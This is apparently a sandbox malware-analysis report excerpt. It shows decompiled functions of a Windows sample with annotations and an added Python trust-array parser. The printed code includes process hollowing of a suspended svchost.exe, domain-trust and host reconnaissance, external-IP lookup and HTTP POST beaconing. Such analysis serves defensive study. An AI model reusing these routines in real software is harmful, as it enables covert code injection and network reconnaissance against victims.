                                                  					} else {
                                                  						return 0;
                                                  					}
                                                  				}
                                                  				return 0;
                                                  			}

                                                  0x003428e1
                                                  0x003428e9
                                                  0x003428f6
                                                  0x003428f9
                                                  0x00342906
                                                  0x00342909
                                                  0x00342910
                                                  0x00342922
                                                  0x0034292d
                                                  0x0034293d
                                                  0x00342949
                                                  0x00342955
                                                  0x00342955
                                                  0x0034296c
                                                  0x00342979
                                                  0x0034297b
                                                  0x0034297b
                                                  0x00342986
                                                  0x0034299a
                                                  0x003429a1
                                                  0x003429ae
                                                  0x003429b2
                                                  0x003429bd
                                                  0x003429c8
                                                  0x003429c8
                                                  0x003429e5
                                                  0x003429eb
                                                  0x003429f2
                                                  0x00342a20
                                                  0x00342a27
                                                  0x00342a3e
                                                  0x00342a40
                                                  0x00342a55
                                                  0x00342a64
                                                  0x00342a73
                                                  0x00342a73
                                                  0x00342a8e
                                                  0x00342a94
                                                  0x00342a97
                                                  0x00342aa2
                                                  0x00342aa4
                                                  0x00342abe
                                                  0x00342acb
                                                  0x00342ae6
                                                  0x00342aee
                                                  0x00342b09
                                                  0x00342af8
                                                  0x00342b00
                                                  0x00342b00
                                                  0x00342aee
                                                  0x00342acb
                                                  0x00342b13
                                                  0x00342b1d
                                                  0x00342b2a
                                                  0x00000000
                                                  0x00342b2c
                                                  0x00000000
                                                  0x00342b2c
                                                  0x00342b2a
                                                  0x00342a2d
                                                  0x00000000
                                                  0x003429f4
                                                  0x00000000
                                                  0x003429f4
                                                  0x003429f2
                                                  0x00000000
                                                  0x0034298e
                                                  0x00000000
                                                  0x0034298e
                                                  0x00342986
                                                  0x00000000

                                                  APIs
                                                  • lstrlenA.KERNEL32(Content-Type: application/x-www-form-urlencoded), ref: 0034291C
                                                  • lstrlenA.KERNEL32(00000000), ref: 0034294F
                                                    • Part of subcall function 003424F0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 00342509
                                                  • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00342964
                                                  • InternetConnectA.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 003429E5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$lstrlen$ConnectCrackOpen
                                                  • String ID: <$Content-Type: application/x-www-form-urlencoded$POST
                                                  • API String ID: 4167639401-2842678110
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not preserved): basic blocks 343000-3430ea; calls OpenProcess, OpenProcessToken, GetTokenInformation, GetLastError, 341390, LookupAccountSidA, 3413d0
                                                  C-Code - Quality: 100%
                                                  			E00343000(long _a4, CHAR* _a8, long _a12, CHAR* _a16, long _a20) {
                                                  				// Resolves the account that owns process _a4 (a PID): _a8/_a12 receive the
                                                  				// user name and its buffer size, _a16/_a20 the domain name and its size.
                                                  				long _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				void* _v24;
                                                  				union _TOKEN_INFORMATION_CLASS _v28;
                                                  				union _SID_NAME_USE _v32;
                                                  				int _t31;
                                                  				int _t37;
                                                  				int _t43;
                                                  
                                                  				_v12 = OpenProcess(0x400, 0, _a4); // 0x400 = PROCESS_QUERY_INFORMATION
                                                  				if(_v12 != 0) {
                                                  					if(OpenProcessToken(_v12, 0x20008,  &_v16) != 0) { // 0x20008 = TOKEN_READ
                                                  						_v8 = 0;
                                                  						_t31 = GetTokenInformation(_v16, 1, 0, 0,  &_v8); // executed; class 1 = TokenUser, sizing call
                                                  						if(_t31 != 0 || GetLastError() != 0x7a) { // 0x7a = ERROR_INSUFFICIENT_BUFFER is the expected outcome
                                                  							return 0;
                                                  						} else {
                                                  							_v24 = E00341390(_v8); // helper, apparently an allocator for _v8 bytes
                                                  							_v20 = _v24;
                                                  							_v28 = 0;
                                                  							_t37 = GetTokenInformation(_v16, 1, _v20, _v8,  &_v8); // executed; fills a TOKEN_USER
                                                  							if(_t37 != 0) {
                                                  								// *_v20 is TOKEN_USER.User.Sid
                                                  								_t43 = LookupAccountSidA(0,  *_v20, _a8,  &_a12, _a16,  &_a20,  &_v32); // executed
                                                  								if(_t43 != 0) {
                                                  									_v28 = 1;
                                                  								}
                                                  							}
                                                  							E003413D0(_v24); // helper, apparently the matching free
                                                  							return _v28;
                                                  						}
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00342E45,?,?,00000104,?,00000104), ref: 00343011
                                                  • OpenProcessToken.ADVAPI32(00000000,00020008,00000104,?,00342E45,?,?,00000104), ref: 00343034
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: OpenProcess$Token
                                                  • String ID: E.4
                                                  • API String ID: 2935449343-2745396128
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not preserved): basic blocks 342c40-342ccf; calls 3414a0, GetEnvironmentVariableA, lstrcatA, CreateProcessA
                                                  C-Code - Quality: 100%
                                                  			E00342C40(void** _a4, intOrPtr* _a8) {
                                                  				// Starts %SystemRoot%\System32\svchost.exe in a suspended state and hands the
                                                  				// new process and primary-thread handles back to the caller through _a4/_a8.
                                                  				struct _PROCESS_INFORMATION _v20;
                                                  				struct _STARTUPINFOA _v88;
                                                  				char _v348;
                                                  				int _t17;
                                                  
                                                  				E003414A0( &_v88, 0, 0x44); // helper, memset-like: zero the STARTUPINFOA (0x44 = sizeof(STARTUPINFOA))
                                                  				_v88.cb = 0x44;
                                                  				GetEnvironmentVariableA("SystemRoot",  &_v348, 0x104); // 0x104 = MAX_PATH
                                                  				lstrcatA( &_v348, "\\System32\\svchost.exe");
                                                  				// 0x424 = CREATE_SUSPENDED | NORMAL_PRIORITY_CLASS | CREATE_UNICODE_ENVIRONMENT
                                                  				_t17 = CreateProcessA(0,  &_v348, 0, 0, 0, 0x424, 0, 0,  &_v88,  &_v20); // executed
                                                  				if(_t17 != 0) {
                                                  					 *_a4 = _v20.hProcess;
                                                  					 *_a8 = _v20.hThread;
                                                  					return 1;
                                                  				}
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 00342C71
                                                  • lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 00342C83
                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 00342CA9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEnvironmentProcessVariablelstrcat
                                                  • String ID: D$SystemRoot$\System32\svchost.exe
                                                  • API String ID: 3510847443-1175289849
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not preserved): basic blocks 342520-3425ad; calls lstrcpyA, 341fe0
                                                  C-Code - Quality: 100%
                                                  			E00342520(void* __ecx, CHAR* _a4) {
                                                  				// Copies the machine's external IP address into _a4. On first use it is fetched
                                                  				// from http://api.ipify.org and cached in the global buffer at 0x347280; the
                                                  				// decompiler shows that buffer by its dumped content, "84.17.52.8".
                                                  				char _v8;
                                                  				void* _t10;
                                                  
                                                  				if( *0x00347280 == 0) { // cache empty: query the lookup service
                                                  					_t10 = E00341FE0("http://api.ipify.org", "84.17.52.8", 0x20,  &_v8); // executed; helper, apparently fetches the URL into the cache (up to 0x20 bytes, length in _v8)
                                                  					if(_t10 != 1) {
                                                  						 *((char*)(0x347280)) = 0; // lookup failed: keep the cache empty
                                                  						lstrcpyA(_a4, "0.0.0.0");
                                                  						return 0;
                                                  					}
                                                  					 *((char*)(_v8 + 0x347280)) = 0; // NUL-terminate after the received bytes
                                                  					lstrcpyA(_a4, "84.17.52.8");
                                                  					return 1;
                                                  				}
                                                  				lstrcpyA(_a4, "84.17.52.8"); // cache hit
                                                  				return 1;
                                                  			}

                                                  APIs
                                                  • lstrcpyA.KERNEL32(00341AD9,84.17.52.8,?,?,00341AD9,?,?), ref: 00342540
                                                  • lstrcpyA.KERNEL32(00341AD9,84.17.52.8,?,?,00341AD9,?,?), ref: 0034257D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy
                                                  • String ID: 0.0.0.0$84.17.52.8$http://api.ipify.org
                                                  • API String ID: 3722407311-370145731
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not preserved): basic blocks 3430f0-343170; calls GetComputerNameA, lstrcatA, 342df0
                                                  C-Code - Quality: 100%
                                                  			E003430F0(CHAR* _a4) {
                                                  				// Builds "<computer name> @ <string produced by E00342DF0>" into _a4.
                                                  				long _v8;
                                                  				char _v268;
                                                  				char _v528;
                                                  				int _t14;
                                                  				void* _t16;
                                                  				int _t31; // added: the decompiler used this temporary without declaring it
                                                  
                                                  				 *_a4 = 0;
                                                  				_v8 = 0x104; // 0x104 = MAX_PATH, buffer size in/out
                                                  				_t14 = GetComputerNameA( &_v268,  &_v8); // executed
                                                  				_t31 = _t14;
                                                  				if(_t14 != 0) {
                                                  					lstrcatA(_a4,  &_v268);
                                                  				}
                                                  				lstrcatA(_a4, " @ ");
                                                  				_t16 = E00342DF0(_t31,  &_v528); // executed; fastcall helper (first argument in ecx) that fills _v528
                                                  				if(_t16 != 0) {
                                                  					lstrcatA(_a4,  &_v528);
                                                  				}
                                                  				return 1;
                                                  			}

                                                  APIs
                                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0034311A
                                                  • lstrcatA.KERNEL32(00100000,?), ref: 0034312F
                                                  • lstrcatA.KERNEL32(00100000, @ ), ref: 0034313E
                                                  • lstrcatA.KERNEL32(00100000,?), ref: 00343162
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$ComputerName
                                                  • String ID: @
                                                  • API String ID: 2583549208-203157567
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not preserved): basic blocks 3423c0-34248a; calls DsEnumerateDomainTrustsA, lstrcatA
                                                  C-Code - Quality: 75%
                                                  			E003423C0(CHAR* _a4) {
                                                  				// Enumerates the domain trusts of the current machine and appends the NetBIOS
                                                  				// and DNS name of every trusted domain to _a4, each followed by ';'.
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				char _v16;
                                                  				long _t30;       // changed: holds the API's return value; the decompiler had tested the pointer &_v16 here, which can never be 0
                                                  				signed int _t26; // added: was used without a declaration
                                                  
                                                  				 *_a4 = 0;
                                                  				// 0x3f = every DS_DOMAIN_* flag; _v12 receives the DS_DOMAIN_TRUSTSA array, _v16 its element count
                                                  				_t30 = __imp__DsEnumerateDomainTrustsA(0, 0x3f,  &_v12,  &_v16); // executed
                                                  				if(_t30 == 0) { // NO_ERROR
                                                  					if(_v16 != 0) {
                                                  						_v8 = 0;
                                                  						while(_v8 < _v16) { // stride 0x2c = sizeof(DS_DOMAIN_TRUSTSA) on x86
                                                  							if( *(_v12 + _v8 * 0x2c) != 0) { // offset 0: NetbiosDomainName
                                                  								lstrcatA(_a4,  *(_v12 + _v8 * 0x2c));
                                                  								lstrcatA(_a4, ";");
                                                  							}
                                                  							if( *((intOrPtr*)(_v12 + 4 + _v8 * 0x2c)) != 0) { // offset 4: DnsDomainName
                                                  								_t26 = 4 + _v8 * 0x2c; // 0xff25f845
                                                  								lstrcatA(_a4,  *(_v12 + _t26));
                                                  								lstrcatA(_a4, ";");
                                                  							}
                                                  							_v8 = _v8 + 1;
                                                  						}
                                                  						return 1; // note: the array in _v12 is never released with NetApiBufferFree
                                                  					}
                                                  					return 1;
                                                  				}
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,00341AE8,?,?,00341AE8,?,?,?), ref: 003423E1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
• Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DomainEnumerateTrusts
                                                  • String ID:
                                                  • API String ID: 4051863571-0
                                                  • Opcode ID: efb5255b167c55bf7aa96ad904c77e17e679bf0017789df3ab1d1c5992f13b3a
                                                  • Instruction ID: c64ad916bb04454d3fbf79c065d7f0f8b3da79d325c4aa996ba01f4caf76d32f
                                                  • Opcode Fuzzy Hash: efb5255b167c55bf7aa96ad904c77e17e679bf0017789df3ab1d1c5992f13b3a
                                                  • Instruction Fuzzy Hash: E4215335500209EBCB19CF95D985FAEBBB9EB44300F5081A8F505AF2A0C730FA81DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
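The trust-enumeration loop above is easiest to verify by running the same arithmetic over a raw array. The following is an added example, not code from the sample or the report: it decodes a 32-bit DS_DOMAIN_TRUSTSA array from a memory image and rebuilds the ';'-joined string exactly as the lstrcatA loop does. The memory image, base address and domain names are constructed for the demo.

```python
"""Rebuild the domain-trust string that the function above assembles, from a
raw 32-bit DS_DOMAIN_TRUSTSA array. Added example, not code from the sample:
the memory image is constructed here so the parser can run offline."""
import struct

# 32-bit layout of DS_DOMAIN_TRUSTSA (dsgetdc.h): two LPSTR, four ULONG, one PSID,
# one GUID -> 0x2c bytes, the stride the sample multiplies the index by.
TRUST_FMT = "<IIIIIII16s"
TRUST_SIZE = struct.calcsize(TRUST_FMT)
assert TRUST_SIZE == 0x2C

# Flag bits; the 0x3f passed to DsEnumerateDomainTrustsA is all six of them.
TRUST_FLAGS = {
    0x01: "DS_DOMAIN_IN_FOREST",
    0x02: "DS_DOMAIN_DIRECT_OUTBOUND",
    0x04: "DS_DOMAIN_TREE_ROOT",
    0x08: "DS_DOMAIN_PRIMARY",
    0x10: "DS_DOMAIN_NATIVE_MODE",
    0x20: "DS_DOMAIN_DIRECT_INBOUND",
}


def read_cstring(mem, base, va):
    """Read a NUL-terminated ANSI string at virtual address va (0 -> None)."""
    if va == 0:
        return None
    off = va - base
    return mem[off:mem.index(b"\x00", off)].decode("ascii")


def parse_trusts(mem, base, array_va, count):
    """Decode count entries of the array that _v12 points at."""
    entries = []
    for i in range(count):
        off = array_va - base + i * TRUST_SIZE  # same arithmetic as _v12 + _v8 * 0x2c
        netbios, dns, flags, _parent, ttype, _tattr, _sid, _guid = struct.unpack_from(TRUST_FMT, mem, off)
        entries.append({
            "netbios": read_cstring(mem, base, netbios),  # offset 0
            "dns": read_cstring(mem, base, dns),          # offset 4
            "flags": [name for bit, name in TRUST_FLAGS.items() if flags & bit],
            "trust_type": ttype,
        })
    return entries


def join_trusts(entries):
    """Mirror the lstrcatA loop: every non-NULL name followed by ';'."""
    out = ""
    for e in entries:
        for name in (e["netbios"], e["dns"]):
            if name:
                out += name + ";"
    return out


def build_sample_dump(base=0x00200000):
    """Constructed 32-bit image: a string pool followed by a two-entry array."""
    names = [b"CORP", b"corp.example", b"PARTNER"]
    pool = bytearray()
    va = {}
    for n in names:
        va[n] = base + len(pool)
        pool += n + b"\x00"
    while len(pool) % 4:
        pool += b"\x00"
    array_va = base + len(pool)
    records = [
        # NetbiosDomainName, DnsDomainName, Flags, ParentIndex, TrustType,
        # TrustAttributes, DomainSid, DomainGuid
        (va[b"CORP"], va[b"corp.example"], 0x01 | 0x08, 0, 2, 0, 0, b"\x00" * 16),
        (va[b"PARTNER"], 0, 0x02, 0, 2, 0, 0, b"\x00" * 16),  # NULL DNS name -> skipped
    ]
    for r in records:
        pool += struct.pack(TRUST_FMT, *r)
    return bytes(pool), base, array_va, len(records)


def sample_trust_string():
    """Run the parser and the join over the constructed image."""
    mem, base, array_va, count = build_sample_dump()
    return join_trusts(parse_trusts(mem, base, array_va, count))


if __name__ == "__main__":
    mem, base, array_va, count = build_sample_dump()
    for e in parse_trusts(mem, base, array_va, count):
        print(e)
    print(sample_trust_string())
```

Pointing `parse_trusts` at a real dump only needs the dump bytes, its load address and the array pointer and count recovered from _v12/_v16; the flag decoding shows which trust relationships the sample would report back.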

Control-flow Graph (basic blocks and successors)

• 250: 342df0-342e4a, call 342e90, call 343000 -> 255, 256
• 255: 342e84 -> 257
• 256: 342e4c-342e82, lstrcpyA, lstrcatA * 2 -> 257
• 257: 342e86-342e89
                                                  C-Code - Quality: 100%
			E00342DF0(void* __eflags, CHAR* _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v276;
				char _v536;
				long _t16;
				void* _t20;

				// Locate the running explorer.exe. E00342E90 resolves the name to a PID
				// (it walks K32EnumProcesses, see the subcall list below); E00343000 opens
				// that PID with PROCESS_QUERY_INFORMATION (0x400) and fills two MAX_PATH
				// (0x104) buffers. The caller's buffer _a4 receives "<_v276>\<_v536>".
				_t16 = E00342E90("explorer.exe"); // executed
				_v16 = _t16;
				_v12 = 0x104;
				_v8 = 0x104;
				 *_a4 = 0;
				_t20 = E00343000(_v16,  &_v536, _v12,  &_v276, _v8); // executed
				if(_t20 == 0) {
					return 0;
				}
				// Three unbounded copies into _a4: _v276, then '\', then _v536.
				lstrcpyA(_a4,  &_v276);
				lstrcatA(_a4, "\\");
				lstrcatA(_a4,  &_v536);
				return 1;
			}











                                                  APIs
                                                    • Part of subcall function 00342E90: K32EnumProcesses.KERNEL32(?,00001000,00342E03), ref: 00342EAD
                                                    • Part of subcall function 00343000: OpenProcess.KERNEL32(00000400,00000000,?,?,00342E45,?,?,00000104,?,00000104), ref: 00343011
                                                  • lstrcpyA.KERNEL32(00000104,?), ref: 00342E57
                                                  • lstrcatA.KERNEL32(00000104,003442B8), ref: 00342E66
                                                  • lstrcatA.KERNEL32(00000104,?), ref: 00342E77
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
• Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$EnumOpenProcessProcesseslstrcpy
                                                  • String ID: explorer.exe
                                                  • API String ID: 1774016706-3187896405
                                                  • Opcode ID: 1e22c196e5af4817aae5281c9ebdd841293c792fbafeeec61f1ea2f7af86c742
                                                  • Instruction ID: 5d7ab605a3f5b6af894d0376a8235643c92bce58605dca09c2802ceaca8b4972
                                                  • Opcode Fuzzy Hash: 1e22c196e5af4817aae5281c9ebdd841293c792fbafeeec61f1ea2f7af86c742
                                                  • Instruction Fuzzy Hash: 221148B5900208ABCB15DFA8DD45BDEB7F8AB49300F004594F609DF241D674EA848B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow Graph (basic blocks and successors)

• 287: 342b80-342b9b, call 342b40 -> 290, 291
• 290: 342ba4-342bb6, call 342c40 -> 295, 296
• 291: 342b9d-342b9f -> 292
• 292: 342c31-342c34
• 295: 342bbd-342bdc, call 343270 -> 299, 300
• 296: 342bb8-342bbb -> 292
• 299: 342bde-342bf9, call 3437e0 -> 300, 305
• 300: 342c08-342c0c -> 302, 303
• 302: 342c0e-342c14, TerminateProcess -> 303
• 303: 342c1a-342c2e, CloseHandle * 2 -> 292
• 305: 342bfb-342c05, GetProcessId -> 300
                                                  C-Code - Quality: 100%
			E00342B80(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t24;
				void* _t27;
				void* _t34;
				long _t36;

				// Injection driver. _v12 is the result, preset to -1 (failure). E00342C40
				// hands back a process handle (_v8) and a thread handle (_v16), presumably
				// a child created suspended, since it is terminated below if the hijack
				// does not complete. E00343270 works on that child with _a4/_a8 and
				// returns two values, _v24 and _v20, which E003437E0 installs as the
				// child's PEB.ImageBaseAddress and initial EAX (its new entry point).
				// Returns the child's PID on success, -1 if any step failed, 0 if
				// E00342B40 rejected _a4.
				_v12 = 0xffffffff;
				if(E00342B40(__ecx, _a4) != 0) {
					_t24 = E00342C40( &_v8,  &_v16); // executed
					if(_t24 != 0) {
						_t27 = E00343270(_v8, _a4, _a8,  &_v24,  &_v20); // executed
						if(_t27 == 1) {
							_t34 = E003437E0(_v8, _v16, _v24, _v20); // executed
							if(_t34 == 1) {
								_t36 = GetProcessId(_v8); // executed
								_v12 = _t36;
							}
						}
						// Kill the half-initialised child rather than leave it suspended.
						if(_v12 == 0xffffffff) {
							TerminateProcess(_v8, 0);
						}
						CloseHandle(_v16);
						CloseHandle(_v8);
						return _v12;
					}
					return _v12;
				}
				return 0;
			}













                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
• Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb019a9e6d45ddcdf21ecd0fb5972519f2c7fc314f57fc8786e0aa0995d53cbd
                                                  • Instruction ID: 8183b429782d0d9983a8bcb91a2684c9cd570192b1628bf401a8bae2c40da40f
                                                  • Opcode Fuzzy Hash: bb019a9e6d45ddcdf21ecd0fb5972519f2c7fc314f57fc8786e0aa0995d53cbd
                                                  • Instruction Fuzzy Hash: B2211FBAD00108BBCB15DBE4D985DAFB7BCAB48310F508654F915EB241E630FA009B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow Graph (basic blocks and successors)

• 306: 342f30-342f51, OpenProcess -> 307, 308
• 307: 342f57-342f7d, K32GetProcessImageFileNameA, CloseHandle -> 308, 310
• 308: 342feb -> 309
• 309: 342fed-342ff0
• 310: 342f7f-342f8d -> 311
• 311: 342f98-342f9e -> 312, 313
• 312: 342fd0-342fd4 -> 308, 314
• 313: 342fa0-342fae -> 315, 316
• 314: 342fd6-342fe9, lstrcpyA -> 309
• 315: 342fb0-342fba -> 316
• 316: 342fbd-342fca -> 317, 318
• 317: 342fcc -> 312
• 318: 342fce -> 311
                                                  C-Code - Quality: 85%
			E00342F30(long _a4, CHAR* _a8) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				char _v280;
				void* _t29;
				void* _t48;

				// Map a PID (_a4) to the base name of its executable. The process is
				// opened with PROCESS_QUERY_INFORMATION (0x400), which is enough for
				// K32GetProcessImageFileNameA; that call (through the thunk L00343BE3)
				// returns a native path such as \Device\HarddiskVolumeN\Windows\explorer.exe
				// into the MAX_PATH (0x104) buffer _v280 and its length into _v20.
				_t29 = OpenProcess(0x400, 0, _a4);
				_v12 = _t29;
				if(_v12 == 0) {
					L12:
					return 0;
				}
				_push(0x104);
				_push( &_v280);
				_push(_v12); // executed
				L00343BE3(); // executed
				_v20 = _t29;
				CloseHandle(_v12); // executed
				if(_v20 <= 0) {
					goto L12;
				}
				// Scan the path via the frame register _t48 (the _t48 + _v8 - 0x114
				// expression indexes _v280). _v16 is moved to the character after every
				// '\\' (0x5c), so it ends up pointing at the last path component.
				_v16 = 0;
				_v8 = 0;
				while(_v8 < _v20) {
					if( *((char*)(_t48 + _v8 - 0x114)) == 0x5c) {
						_v16 = _t48 + _v8 - 0x113;
					}
					if( *((char*)(_t48 + _v8 - 0x114)) != 0) {
						_v8 = _v8 + 1;
						continue;
					} else {
						break;
					}
				}
				// A path with no separator yields nothing; otherwise copy the file name.
				if(_v16 == 0) {
					goto L12;
				}
				lstrcpyA(_a8, _v16);
				return 1;
			}











                                                  APIs
                                                  • OpenProcess.KERNEL32(00000400,00000000,00342E03), ref: 00342F44
                                                  • K32GetProcessImageFileNameA.KERNEL32 ref: 00342F67
                                                  • CloseHandle.KERNEL32(00000000), ref: 00342F73
                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 00342FDE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
• Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseFileHandleImageNameOpenlstrcpy
                                                  • String ID:
                                                  • API String ID: 2420205050-0
                                                  • Opcode ID: db0eec48c8561ac4fd5e40b8caf8ca870bdf6baa992dd267b832af0a1cd2dcd1
                                                  • Instruction ID: db84e89580a781198b59f224c71a1fe25189c0e3980fa8bea8e0befcdcf4211d
                                                  • Opcode Fuzzy Hash: db0eec48c8561ac4fd5e40b8caf8ca870bdf6baa992dd267b832af0a1cd2dcd1
                                                  • Instruction Fuzzy Hash: 4D211D74A0410CEBCB16CF94D985BEEB7F9BB44305FA081A9F615AB280C7746A48DF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
			E003437E0(void* _a4, void* _a8, void _a12, intOrPtr _a16) {
				struct _CONTEXT _v720;
				int _t17;
				int _t19;

				// Thread hijack. _v720 is a 32-bit CONTEXT: ContextFlags at offset 0,
				// then 0x2c8 bytes from Dr0 to the end (0x2cc in total), zeroed here by
				// E003414A0 (memset-style). 0x10002 is CONTEXT_i386 | CONTEXT_INTEGER,
				// which covers EAX and EBX. For the initial thread of a suspended 32-bit
				// process EBX points at the PEB and EAX holds the image entry point, so:
				_v720.ContextFlags = 0x10002;
				E003414A0( &(_v720.Dr0), 0, 0x2c8);
				if(GetThreadContext(_a8,  &_v720) != 0) {
